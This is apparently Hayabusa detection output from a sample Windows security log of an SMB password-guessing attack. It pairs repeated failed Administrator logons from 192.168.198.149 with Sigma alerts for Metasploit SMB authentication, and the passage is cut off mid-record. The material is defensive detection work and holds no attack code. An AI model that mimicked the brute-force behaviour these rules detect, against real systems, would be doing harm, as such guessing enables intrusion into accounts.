NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.195 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Hv2Lz1h1bG6UatVR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.241 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FLKPLfEe3PpEzRNc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZJWv7ggzCSyEznOI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.336 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZUtR9CNfKMHQMd7T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.381 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.433 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6fYNHuRTqi15cRkL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.433 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.488 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DvxZHwJwrBYXlEyv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.488 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.530 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: jscJTJjhKvCtDl8q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.530 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.575 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mZEIEjcimMyHWUsp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.575 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.618 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 30OdVRH9ZATLezsR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.618 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TJ1OSBVZHKmyOzj8 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.652 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.694 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JanG6Q0oYpTdm9mC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.694 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.736 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PWCwDYL3T7TAdb0J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.736 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.777 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mRdyZaio1HjUKlNQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.777 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VjiRnExy9TzZTG0R : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.825 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ztUyQpl8c9RoAr1j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.860 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.909 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jC23QAFM07q7cfVo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.909 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.957 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: TSM8lmdOFoDslQNa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.957 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sGZaUGAT1oXmnGLB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZMNo21pTA67pb7Go : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.049 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.091 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EiTZCqK3m4icL1Vi : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.091 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZaZ2mnoihX1Ec4di : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.124 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ihm9zaXkmWklXk4u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.160 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.201 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yLIZ3tlw9VlQmK28 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.201 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.249 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GVHzJHTi55NbxXYY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.249 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1FROeEnMLna2fTTH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.296 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.332 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pio6ZZ9pV0pS2Whi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.332 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.376 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: h1aD2w5U5K9ND5HV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.376 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zF8Jb4GpG4D3xn9i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.428 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Edv4GwGfL156V1xe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.457 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.570 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Irvneva9RFn44iII : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.570 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.617 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dHtJFI8OL9kJylL5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.617 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.661 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F5Q4h62T77hGjhKe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.661 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DdSALwo9td9xUeBq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.696 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1kYfoqz1r1NuEn04 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.752 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.791 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7X400gufqdunUa8j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.791 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lLR8z7g0GY8r7a1r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.825 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.867 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: QHMztrxiKBGtNqkp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.867 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.905 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7eBQevVhmZs5gHFD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.905 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.953 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lyQCs0PG6fGzpidu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.953 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XnsPjnCieyoFIbJZ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.996 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ku6mjVaG1lCJrAo1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.052 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VwiyVIWHOGuHzhdO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 92v1rXcj5c0Lt3OF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.149 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yO2JYd6FfM2Y7px9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.184 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ltr5g8ZWUAdrPKxg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.225 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.272 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fjiPMy5uOTbbmaQ5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.272 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
